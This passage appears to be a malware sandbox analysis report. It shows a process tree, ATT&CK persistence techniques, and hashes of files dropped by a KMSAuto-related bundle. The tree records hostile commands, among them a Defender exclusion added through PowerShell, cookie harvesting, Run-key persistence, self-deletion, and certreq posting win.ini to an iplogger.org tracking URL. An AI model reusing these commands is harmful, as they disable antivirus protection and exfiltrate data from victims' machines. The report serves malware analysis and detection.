C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Polished-Silence"16⤵
-
C:\Program Files (x86)\Polished-Silence\7za.exe"C:\Program Files (x86)\Polished-Silence\7za.exe" e -p154.61.71.13 winamp-plugins.7z16⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Polished-Silence\app.exe" -map "C:\Program Files (x86)\Polished-Silence\WinmonProcessMonitor.sys""16⤵
-
C:\Program Files (x86)\Polished-Silence\app.exe"C:\Program Files (x86)\Polished-Silence\app.exe" -map "C:\Program Files (x86)\Polished-Silence\WinmonProcessMonitor.sys"17⤵
-
C:\Program Files (x86)\Polished-Silence\7za.exe"C:\Program Files (x86)\Polished-Silence\7za.exe" e -p154.61.71.13 winamp.7z16⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\Delta.exe" /Verysilent4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EQHMS.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-EQHMS.tmp\Delta.tmp" /SL5="$5064A,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\Delta.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-5744N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5744N.tmp\Setup.exe" /VERYSILENT6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 8767⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\zznote.exe" /Verysilent4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\is-QQ32Q.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-QQ32Q.tmp\zznote.tmp" /SL5="$30866,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\zznote.exe" /Verysilent5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-BTSF7.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-BTSF7.tmp\jg4_4jaa.exe" /silent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-AH9MD.tmp\hjjgaa.exe" /Verysilent4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\is-29H79.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-29H79.tmp\chashepro3.tmp" /SL5="$8029A,1478410,58368,C:\Users\Admin\AppData\Local\Temp\b4hgb2iyzsf\chashepro3.exe" /VERYSILENT1⤵
-
C:\Program Files (x86)\JCleaner\mex.exe"C:\Program Files (x86)\JCleaner\mex.exe"2⤵
-
C:\Program Files (x86)\JCleaner\mex.exe"{path}"3⤵
-
C:\Program Files (x86)\JCleaner\mex.exe"{path}"3⤵
-
C:\Program Files (x86)\JCleaner\mex.exe"{path}"3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\mex.exe"4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\23⤵
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"2⤵
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"3⤵
-
C:\Program Files (x86)\JCleaner\Brava.exe"C:\Program Files (x86)\JCleaner\Brava.exe"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-M493H.tmp\10r2xzn2cgg.tmp"C:\Users\Admin\AppData\Local\Temp\is-M493H.tmp\10r2xzn2cgg.tmp" /SL5="$206FE,552809,216064,C:\Users\Admin\AppData\Roaming\liu1brfsx3j\10r2xzn2cgg.exe" /VERYSILENT /p=testparams1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\961de38a5126447a993ee6d0df7f64b3 /t 0 /p 50721⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{2fef7b5d-496c-7241-abd5-916e4b8ef114}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000168"2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\0489436869cd469b9d33e96bdb180a53 /t 10128 /p 99241⤵
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\e5fad30295c2461bbd2f1d260896269f /t 8676 /p 91161⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Users\Admin\AppData\Local\Temp\2729.tmp.exeC:\Users\Admin\AppData\Local\Temp\2729.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\4F44.tmp.exeC:\Users\Admin\AppData\Local\Temp\4F44.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\5995.tmp.exeC:\Users\Admin\AppData\Local\Temp\5995.tmp.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7DD8.tmp.exeC:\Users\Admin\AppData\Local\Temp\7DD8.tmp.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
New Service
1Modify Existing Service
2Registry Run Keys / Startup Folder
3Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\KMSAuto\bin.datMD5
4d2e5affe6d1ccb42f6650fd57448a9b
SHA12d2e279036d777e59b729e58f0b0e41da559067a
SHA2563cbf7c0231b3266b4a6946dcf9aaa39c2bf077f6e459ca9ead39c516cbfce74c
SHA512b33c25cd2fbc257ed2d6b41c5591288e81aee478248193b53e87c8f844689fa8cb507f27f844a9a8330f244f0bdea610565df16f214b2c4efe33448ddeeec756
-
C:\ProgramData\KMSAuto\bin.datMD5
4d2e5affe6d1ccb42f6650fd57448a9b
SHA12d2e279036d777e59b729e58f0b0e41da559067a
SHA2563cbf7c0231b3266b4a6946dcf9aaa39c2bf077f6e459ca9ead39c516cbfce74c
SHA512b33c25cd2fbc257ed2d6b41c5591288e81aee478248193b53e87c8f844689fa8cb507f27f844a9a8330f244f0bdea610565df16f214b2c4efe33448ddeeec756
-
C:\ProgramData\KMSAuto\bin\AESDecoder.exeMD5
b90ed3e4dbb23a464723706f12c86065
SHA196aa9e1d2f2e51aaf094a268df19163cb94f623a
SHA2568391d5b724d235ba52531d9a6d85e466382ce15cbd6ba97c4ad1278ed1f03bd7
SHA51292e0f414f1eca28788c885cb193e6baccf37641bcdc120f4db5a80849a61c6bd861987631753a0a93149c669d5814d7b7a79f1cd5087480fbb31465be53bb992
-
C:\ProgramData\KMSAuto\bin\AESDecoder.exeMD5
b90ed3e4dbb23a464723706f12c86065
SHA196aa9e1d2f2e51aaf094a268df19163cb94f623a
SHA2568391d5b724d235ba52531d9a6d85e466382ce15cbd6ba97c4ad1278ed1f03bd7
SHA51292e0f414f1eca28788c885cb193e6baccf37641bcdc120f4db5a80849a61c6bd861987631753a0a93149c669d5814d7b7a79f1cd5087480fbb31465be53bb992
-
C:\ProgramData\KMSAuto\bin\KMSSS.exeMD5
01a80aad5dabed1c1580f7e00213cf9d
SHA1174f9e420ab6c21e59ff7a0e42b8ebb3d742f0ec
SHA256fd7499214abaa13bf56d006ab7de78eb8d6adf17926c24ace024d067049bc81d
SHA512f254dfc103f79093bbae02d03d5906aafab7a94fa946373037407c270e67f0eb7972f8524cf2d98129bf6af2b8ba50f4ba0fb2b31d9d7b4dcb45d79e689d325b
-
C:\ProgramData\KMSAuto\bin\KMSSS.exeMD5
01a80aad5dabed1c1580f7e00213cf9d
SHA1174f9e420ab6c21e59ff7a0e42b8ebb3d742f0ec
SHA256fd7499214abaa13bf56d006ab7de78eb8d6adf17926c24ace024d067049bc81d
SHA512f254dfc103f79093bbae02d03d5906aafab7a94fa946373037407c270e67f0eb7972f8524cf2d98129bf6af2b8ba50f4ba0fb2b31d9d7b4dcb45d79e689d325b
-
C:\ProgramData\KMSAuto\bin\KMSSS.exe.aesMD5
41e0d8ab5104da2068739109ec3599f4
SHA131aeec9aa396a677f54218f7310d8e627446bdd8
SHA25638d1dbdc7c7a64253e6d4b52225b0bfd7716405c731a107f0c6ba9573a73a77f
SHA51254afe0804dfd8ca9381fbbd23043250346120792611b04cc11caf089942001bcc97aa5e2d4433e81debb99a85696f6e2c389badff2710d6a52f4717fcde3e0a0
-
C:\ProgramData\KMSAuto\bin\TunMirror2.exe.aesMD5
a1a5afa53b578db6abf400a88548f487
SHA1b73ae3c93a43074afe54e611bad938da98eee385
SHA256a9e76d637e0c0a65036d7f2d5c3d7b1c53218b94716554f4d9f6630dcff8c75a
SHA512c9cff93b807d0db06d8a67e4e1b2e934f84a509a5f9af4bd0f4ad84eaec6874412c0c094c034d8637cacd3219bb7c82723a25f35907cba5024293e46991d4e2c
-
C:\ProgramData\KMSAuto\bin\driver\oas_sert.cerMD5
0041584e5f66762b1fa9be8910d0b92b
SHA18788377c653a5b79ef04c05c15d3ca52d6253469
SHA256bb27684b569cbb72dec63ea6fdef8e5f410cdaeb73717eee1b36478dbcff94cc
SHA512fc32985bd3b626a1baa5353595a25d85339bc8aeb8f8d9fdd881e514d7f4cdd90fe5de273f702c9f673cd625a7e90cd3979d695d4daabe72fa952c8318f64b71
-
C:\ProgramData\KMSAuto\bin\driver\oas_sert.cerMD5
0041584e5f66762b1fa9be8910d0b92b
SHA18788377c653a5b79ef04c05c15d3ca52d6253469
SHA256bb27684b569cbb72dec63ea6fdef8e5f410cdaeb73717eee1b36478dbcff94cc
SHA512fc32985bd3b626a1baa5353595a25d85339bc8aeb8f8d9fdd881e514d7f4cdd90fe5de273f702c9f673cd625a7e90cd3979d695d4daabe72fa952c8318f64b71
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\OemVista.infMD5
87868193626dc756d10885f46d76f42e
SHA194a5ce8ed7633ed77531b6cb14ceb1927c5cae1f
SHA256b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41
SHA51279751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\OemVista.infMD5
87868193626dc756d10885f46d76f42e
SHA194a5ce8ed7633ed77531b6cb14ceb1927c5cae1f
SHA256b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41
SHA51279751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\OemVista.infMD5
87868193626dc756d10885f46d76f42e
SHA194a5ce8ed7633ed77531b6cb14ceb1927c5cae1f
SHA256b5728e42ea12c67577cb9188b472005ee74399b6ac976e7f72b48409baee3b41
SHA51279751330bed5c16d66baf3e5212be0950f312ffd5b80b78be66eaea3cc7115f8a9472d2a43b5ce702aa044f3b45fd572775ff86572150df91cc27866f88f8277
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\devcon.exeMD5
3904d0698962e09da946046020cbcb17
SHA1edae098e7e8452ca6c125cf6362dda3f4d78f0ae
SHA256a51e25acc489948b31b1384e1dc29518d19b421d6bc0ced90587128899275289
SHA512c24ab680981d8d6db042b52b7b5c5e92078df83650cad798874fc09ce8c8a25462e1b69340083f4bcad20d67068668abcfa8097e549cfa5ad4f1ee6a235d6eea
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\devcon.exeMD5
3904d0698962e09da946046020cbcb17
SHA1edae098e7e8452ca6c125cf6362dda3f4d78f0ae
SHA256a51e25acc489948b31b1384e1dc29518d19b421d6bc0ced90587128899275289
SHA512c24ab680981d8d6db042b52b7b5c5e92078df83650cad798874fc09ce8c8a25462e1b69340083f4bcad20d67068668abcfa8097e549cfa5ad4f1ee6a235d6eea
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\tap0901.catMD5
c757503bc0c5a6679e07fe15b93324d6
SHA16a81aa87e4b07c7fea176c8adf1b27ddcdd44573
SHA25691ebea8ad199e97832cf91ea77328ed7ff49a1b5c06ddaacb0e420097a9b079e
SHA512efd1507bc7aa0cd335b0e82cddde5f75c4d1e35490608d32f24a2bed0d0fbcac88919728e3b3312665bd1e60d3f13a325bdcef4acfddab0f8c2d9f4fb2454d99
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\tap0901.catMD5
c757503bc0c5a6679e07fe15b93324d6
SHA16a81aa87e4b07c7fea176c8adf1b27ddcdd44573
SHA25691ebea8ad199e97832cf91ea77328ed7ff49a1b5c06ddaacb0e420097a9b079e
SHA512efd1507bc7aa0cd335b0e82cddde5f75c4d1e35490608d32f24a2bed0d0fbcac88919728e3b3312665bd1e60d3f13a325bdcef4acfddab0f8c2d9f4fb2454d99
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\tap0901.sysMD5
d765f43cbea72d14c04af3d2b9c8e54b
SHA1daebe266073616e5fc931c319470fcf42a06867a
SHA25689c5ca1440df186497ce158eb71c0c6bf570a75b6bc1880eac7c87a0250201c0
SHA512ff83225ed348aa8558fb3055ceb43863bad5cf775e410ed8acda7316b56cd5c9360e63ed71abbc8929f7dcf51fd9a948b16d58242a7a2b16108e696c11d548b2
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP1\tap0901.sysMD5
d765f43cbea72d14c04af3d2b9c8e54b
SHA1daebe266073616e5fc931c319470fcf42a06867a
SHA25689c5ca1440df186497ce158eb71c0c6bf570a75b6bc1880eac7c87a0250201c0
SHA512ff83225ed348aa8558fb3055ceb43863bad5cf775e410ed8acda7316b56cd5c9360e63ed71abbc8929f7dcf51fd9a948b16d58242a7a2b16108e696c11d548b2
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\devcon.exeMD5
7f0c8f7b6f6d22ecd83013f2f26a71ae
SHA1dbda3a84c97777a5b47f87868aea2a7cd4c6739b
SHA256a4e561f666c08353c2226e8e264555c406893b0ad1b74fd05f4f29655e128809
SHA512e9dea69961b1bb8ab41067870db9b0c661a42ecba633429d6ea6aaa19a10c60cbcd4acbf9e5e1545c86f1d836696eac5b5a445baae2499418c2eef76d1de6d5a
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\devcon.exeMD5
7f0c8f7b6f6d22ecd83013f2f26a71ae
SHA1dbda3a84c97777a5b47f87868aea2a7cd4c6739b
SHA256a4e561f666c08353c2226e8e264555c406893b0ad1b74fd05f4f29655e128809
SHA512e9dea69961b1bb8ab41067870db9b0c661a42ecba633429d6ea6aaa19a10c60cbcd4acbf9e5e1545c86f1d836696eac5b5a445baae2499418c2eef76d1de6d5a
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\tapoas.catMD5
8dc91f1bf59f58554dc195c9ffcb59ec
SHA17f73c23c96d4a326a07c5a1bf81b3ea98c6ab87f
SHA2560b42f01e4c8732d246260b6ba76a5e096e1da3047898dff6fb71eede68951c87
SHA5124b207802936d443f25b42e27030c28687f3a3d63bb8202a16dc5c74446f9ebdcdce3f753a4bfe5d62715ffc82063d0f187b1d27696743f890f30b8333630a8bf
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\tapoas.catMD5
8dc91f1bf59f58554dc195c9ffcb59ec
SHA17f73c23c96d4a326a07c5a1bf81b3ea98c6ab87f
SHA2560b42f01e4c8732d246260b6ba76a5e096e1da3047898dff6fb71eede68951c87
SHA5124b207802936d443f25b42e27030c28687f3a3d63bb8202a16dc5c74446f9ebdcdce3f753a4bfe5d62715ffc82063d0f187b1d27696743f890f30b8333630a8bf
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\tapoas.infMD5
61243cb103543ee3163bf16df69bcb54
SHA14ffbe472cc93ff8a827a12e63ff79fc48c684402
SHA2561652b1de2f15eeacbd06e0ab14ada5a466316ffd3ab88d4a2a46cfcbd25fdfa1
SHA512419aa9fd6d3df2785353fe2efcffb5525d161d9b07e0284857065d6461fcc9e9932d7cca9b20a0ec46c8bebff9aa0d8e9d1a29face8cecff23c15e57fc7f430e
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\tapoas.infMD5
61243cb103543ee3163bf16df69bcb54
SHA14ffbe472cc93ff8a827a12e63ff79fc48c684402
SHA2561652b1de2f15eeacbd06e0ab14ada5a466316ffd3ab88d4a2a46cfcbd25fdfa1
SHA512419aa9fd6d3df2785353fe2efcffb5525d161d9b07e0284857065d6461fcc9e9932d7cca9b20a0ec46c8bebff9aa0d8e9d1a29face8cecff23c15e57fc7f430e
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\tapoas.sysMD5
927d0cdb3f96efc1e98fb1a2c9fb67ad
SHA19bbb2d28f2f9736d59b94ea260abd4ded7d7b5be
SHA25658f14daa0ea21ea2f2a1d3d62c88bd8e5a0e0ef498b7b8d367beeade6a46843c
SHA512a3f977390e251cefbb9bad7e338cba23b8129907475d559bda187985aa552afbd2b14db1ee4e288e7ecb5fb9a23547bf4bbacf38049cd05152e635fd0d36af97
-
C:\ProgramData\KMSAuto\bin\driver\x64TAP2\tapoas.sysMD5
927d0cdb3f96efc1e98fb1a2c9fb67ad
SHA19bbb2d28f2f9736d59b94ea260abd4ded7d7b5be
SHA25658f14daa0ea21ea2f2a1d3d62c88bd8e5a0e0ef498b7b8d367beeade6a46843c
SHA512a3f977390e251cefbb9bad7e338cba23b8129907475d559bda187985aa552afbd2b14db1ee4e288e7ecb5fb9a23547bf4bbacf38049cd05152e635fd0d36af97
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeMD5
b85f4ce841f3ae1ebdf76835d2eadbef
SHA165c215dd7b7a3e8cb76003c252e13fa1e8e50c7c
SHA256ce28748f6ae7b54ab35fc31d825e80a26e143737cf4748fff523781e04c1ee79
SHA512c86326cf84b8ae8e72a5d49940a95a525db6f97ca859f15d90f6db9bc11b45a0c326bfe387c243c05f3578528ad2b2bfeea1db2950b331c71fac959fafab3d4f
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeMD5
b85f4ce841f3ae1ebdf76835d2eadbef
SHA165c215dd7b7a3e8cb76003c252e13fa1e8e50c7c
SHA256ce28748f6ae7b54ab35fc31d825e80a26e143737cf4748fff523781e04c1ee79
SHA512c86326cf84b8ae8e72a5d49940a95a525db6f97ca859f15d90f6db9bc11b45a0c326bfe387c243c05f3578528ad2b2bfeea1db2950b331c71fac959fafab3d4f
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeMD5
b85f4ce841f3ae1ebdf76835d2eadbef
SHA165c215dd7b7a3e8cb76003c252e13fa1e8e50c7c
SHA256ce28748f6ae7b54ab35fc31d825e80a26e143737cf4748fff523781e04c1ee79
SHA512c86326cf84b8ae8e72a5d49940a95a525db6f97ca859f15d90f6db9bc11b45a0c326bfe387c243c05f3578528ad2b2bfeea1db2950b331c71fac959fafab3d4f
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeMD5
b85f4ce841f3ae1ebdf76835d2eadbef
SHA165c215dd7b7a3e8cb76003c252e13fa1e8e50c7c
SHA256ce28748f6ae7b54ab35fc31d825e80a26e143737cf4748fff523781e04c1ee79
SHA512c86326cf84b8ae8e72a5d49940a95a525db6f97ca859f15d90f6db9bc11b45a0c326bfe387c243c05f3578528ad2b2bfeea1db2950b331c71fac959fafab3d4f
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exeMD5
b85f4ce841f3ae1ebdf76835d2eadbef
SHA165c215dd7b7a3e8cb76003c252e13fa1e8e50c7c
SHA256ce28748f6ae7b54ab35fc31d825e80a26e143737cf4748fff523781e04c1ee79
SHA512c86326cf84b8ae8e72a5d49940a95a525db6f97ca859f15d90f6db9bc11b45a0c326bfe387c243c05f3578528ad2b2bfeea1db2950b331c71fac959fafab3d4f
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WdfCoInstaller01009.dllMD5
be566e174eaf5b93b0474593cd8f2715
SHA1350ca8482be913dd9ca7a279fb5680a884402e26
SHA256cee8496bfa1080fd84fc48ba4375625238900fe93ea739b2dc0300206fde8330
SHA512fc608acd903daf17250b8ee0f2491458cf06eca9856988fce6b8134f8deb2a3716c3641977d24e3614c9abf344184225bffeeb25212d374988115b15d0ce4b5b
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WdfCoInstaller01009.dllMD5
be566e174eaf5b93b0474593cd8f2715
SHA1350ca8482be913dd9ca7a279fb5680a884402e26
SHA256cee8496bfa1080fd84fc48ba4375625238900fe93ea739b2dc0300206fde8330
SHA512fc608acd903daf17250b8ee0f2491458cf06eca9856988fce6b8134f8deb2a3716c3641977d24e3614c9abf344184225bffeeb25212d374988115b15d0ce4b5b
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.dllMD5
3f0c03e5076c7e6b404f894ff4dc5bb1
SHA19cf99c875e6acd4b12e0eddd5fa51d296ea4998e
SHA2564e7ebed8410c83b73a23185aa94680143da2933305cd6deefe8ec0b51b7ee6f3
SHA51220de17d511cc1b3f283a28423f5bdfaef36f104d62c33a1da6449c528d1d8e4986afe8ef68e590add9262c3c7441132022a049022d14deba08a8c72e139f78f4
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.dllMD5
3f0c03e5076c7e6b404f894ff4dc5bb1
SHA19cf99c875e6acd4b12e0eddd5fa51d296ea4998e
SHA2564e7ebed8410c83b73a23185aa94680143da2933305cd6deefe8ec0b51b7ee6f3
SHA51220de17d511cc1b3f283a28423f5bdfaef36f104d62c33a1da6449c528d1d8e4986afe8ef68e590add9262c3c7441132022a049022d14deba08a8c72e139f78f4
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.dllMD5
3f0c03e5076c7e6b404f894ff4dc5bb1
SHA19cf99c875e6acd4b12e0eddd5fa51d296ea4998e
SHA2564e7ebed8410c83b73a23185aa94680143da2933305cd6deefe8ec0b51b7ee6f3
SHA51220de17d511cc1b3f283a28423f5bdfaef36f104d62c33a1da6449c528d1d8e4986afe8ef68e590add9262c3c7441132022a049022d14deba08a8c72e139f78f4
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.infMD5
a94d989905a248afca52bc3cbfcb248b
SHA1cbb7b37584a58060da6a3dd748f17334384647e7
SHA2566c9f7dea4f9a47788d5d2ba110b08457fd00dbabe4812ebca6f022300843a75d
SHA512864eae03a01ac79917e91913fa7d83847f67f259ce8b5b42853c7ffd9a1f6847b9a4adec4d31a6ec882265fd369214bdbd147c6dc76b89bdf1bb2001046ec43f
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.infMD5
a94d989905a248afca52bc3cbfcb248b
SHA1cbb7b37584a58060da6a3dd748f17334384647e7
SHA2566c9f7dea4f9a47788d5d2ba110b08457fd00dbabe4812ebca6f022300843a75d
SHA512864eae03a01ac79917e91913fa7d83847f67f259ce8b5b42853c7ffd9a1f6847b9a4adec4d31a6ec882265fd369214bdbd147c6dc76b89bdf1bb2001046ec43f
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.infMD5
a94d989905a248afca52bc3cbfcb248b
SHA1cbb7b37584a58060da6a3dd748f17334384647e7
SHA2566c9f7dea4f9a47788d5d2ba110b08457fd00dbabe4812ebca6f022300843a75d
SHA512864eae03a01ac79917e91913fa7d83847f67f259ce8b5b42853c7ffd9a1f6847b9a4adec4d31a6ec882265fd369214bdbd147c6dc76b89bdf1bb2001046ec43f
-
C:\ProgramData\KMSAuto\bin\driver\x64WDV\WinDivert.sysMD5
